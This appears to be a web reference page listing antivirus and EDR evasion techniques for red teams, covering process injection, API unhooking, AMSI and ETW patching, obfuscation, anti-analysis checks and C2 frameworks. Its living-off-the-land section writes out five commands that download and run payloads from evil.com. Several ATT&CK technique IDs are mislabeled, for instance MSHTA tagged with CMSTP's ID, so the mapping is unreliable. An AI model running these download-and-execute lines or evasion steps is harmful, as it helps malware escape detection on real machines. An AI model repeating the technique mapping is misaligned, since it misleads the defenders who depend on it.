🎭 AV/EDR Evasion Techniques
Comprehensive guide to bypassing antivirus, EDR solutions, and endpoint protection. Learn process injection, code obfuscation, and defense evasion techniques used by red teams and advanced threat actors.
Evasion techniques allow malware and penetration testing tools to bypass security controls, avoid detection by EDR solutions, and execute malicious code without triggering alerts. These techniques are critical for red team operations and advanced threat simulations.
💉 Process Injection

DLL Injection (ATT&CK T1055.001, Expert)
Inject a malicious DLL into a running process via CreateRemoteThread and LoadLibrary. A classic technique used by malware.

Process Hollowing (ATT&CK T1055.008, Expert)
Unmap a legitimate process image and replace it with malicious code. Create the target process in a suspended state, then hollow it out.

Process Doppelgänging (ATT&CK T1055.009, Expert)
Use NTFS transactions to replace an executable at rest while running the process from the cached version. Bypasses file-based AV.

APC Injection (ATT&CK T1055.004, Advanced)
Queue Asynchronous Procedure Calls to threads in an alertable state. Fire-and-forget execution before the threads return to user code.

Early Bird Injection (ATT&CK T1055.001, Expert)
Inject shellcode before the target process reaches its entry point, during the ntdll initialization phase.

Thread Local Storage Injection (ATT&CK T1055.005, Advanced)
Manipulate TLS callbacks to redirect execution to malicious code when the process or a thread starts.

🛡️ EDR Bypass Techniques
DLL Unhooking (Custom, Expert)
Restore hooked API functions by copying clean .text sections from the DLLs on disk. Removes EDR inline hooks from ntdll, kernel32, etc.

ETW Blocking (Custom, Advanced)
Patch EtwEventWrite and EtwTiLogOnstackEvent to block ETW telemetry. Prevents kernel event tracing.

AMSI Bypass (Custom, Advanced)
Patch AmsiScanBuffer and AmsiScanString to always return AMSI_RESULT_CLEAN, so PowerShell scripts execute without being scanned.

Direct Syscalls (Custom, Expert)
Bypass user-land hooks by issuing system calls directly instead of calling through the hooked ntdll exports. Use the syscall numbers to call the kernel directly.

Heaven's Gate (Custom, Expert)
Execute 64-bit code from a 32-bit process via a far jump into the 64-bit code segment. Bypasses 32-bit-only monitoring.

Timing Attacks (Custom, Advanced)
Call Sleep() and measure the elapsed time to detect instrumentation; sleep longer if being debugged.

🔐 Code Obfuscation
Payload Packers (T1027.002, Advanced)
Compress and encrypt executables and decrypt them at runtime in memory. UPX, or custom packers with anti-debugging.

Shellcode Encryption (T1027.001, Advanced)
Encrypt shellcode with AES-256, with the key stored separately or derived at runtime. Obfuscate strings.

Polymorphic Code (T1027.001, Expert)
Self-modifying code that changes its appearance on each execution. Uses junk code insertion and register randomization.

XOR Obfuscation (T1027.001, Intermediate)
Simple XOR encoding with single- or multi-byte keys, decoded at runtime before execution.

🎭 Defense Evasion
Parent PID Spoofing (T1134.004, Advanced)
Spawn processes with a spoofed parent PID (e.g. explorer.exe). Makes attribution harder and avoids parent-child process monitoring.

Masquerading (T1036, Intermediate)
Rename malicious executables to match system binaries. Use Windows\System32 paths to appear legitimate.

Timestomping (T1070.006, Intermediate)
Modify file timestamps (create/modify/access) to match legitimate files or blend in with existing files.

File Deletion (T1070.004, Intermediate)
Delete files after use with native tools (cmd.exe del) or direct syscalls to avoid the recycle bin.

Network Evasion (T1090, Advanced)
Use domain fronting, encrypted C2 channels, and fast-flux DNS to avoid network-based detection.

Service Root (T1569.002, Advanced)
Run malicious code as a Windows service via sc.exe or direct service API calls with SYSTEM privileges.

🔍 Anti-Analysis Techniques
Anti-Debugging (T1143, Advanced)
Detect debugger presence using IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess.

Anti-VM Detection (T1497.001, Advanced)
Detect virtualized environments via CPUID, MAC addresses, registry keys, WMIC output, and hardware artifacts.

Anti-Sandbox (T1497, Advanced)
Detect sandboxes by checking user count, running processes, sample folder paths, and idle time.

Memory Scrubbing (Custom, Expert)
Clear forensic evidence from memory after execution. Zero out allocated memory regions before freeing them.

🧪 LOLBAS (Living Off the Land)
CertUtil Download (T1105, Intermediate)
certutil.exe -urlcache -split -f http://evil.com/payload.exe payload.exe

MSHTA Execution (T1218.003, Intermediate)
mshta.exe http://evil.com/payload.hta - Execute HTA content from a URL or local file.

MSBuild (T1127, Advanced)
Execute inline C# code via MSBuild.exe. No separate compiler needed; executes in a clean process.

Regsvr32 (T1218.010, Intermediate)
regsvr32.exe /s /n /u /i:http://evil.com/file.sct - Execute via an SCT scriptlet.

CMSTP (T1218.003, Intermediate)
cmstp.exe /s /ns http://evil.com/payload.inf - Bypass UAC and execute via CMSTP.

Msiexec (T1218.007, Intermediate)
msiexec.exe /q /i http://evil.com/payload.msi - Execute via an MSI package.

🛠️ Essential Tools
Cobalt Strike
Commercial red team C2 framework with built-in evasion capabilities, process injection, and lateral movement.

Covenant
Open-source .NET-based C2 framework with strong cross-platform support and built-in evasion features.

Sliver
Open-source C2 framework by Bishop Fox with implant generation, process injection, and EDR bypass.

PE-Sieve
Memory forensics tool to detect process hollowing, Doppelgänging, and other injection techniques.

Frida
Dynamic instrumentation toolkit for hooking, tracing, and manipulating running processes at runtime.

UnhookPE
Tool to unhook EDR DLL hooks by restoring original functions from disk-loaded copies.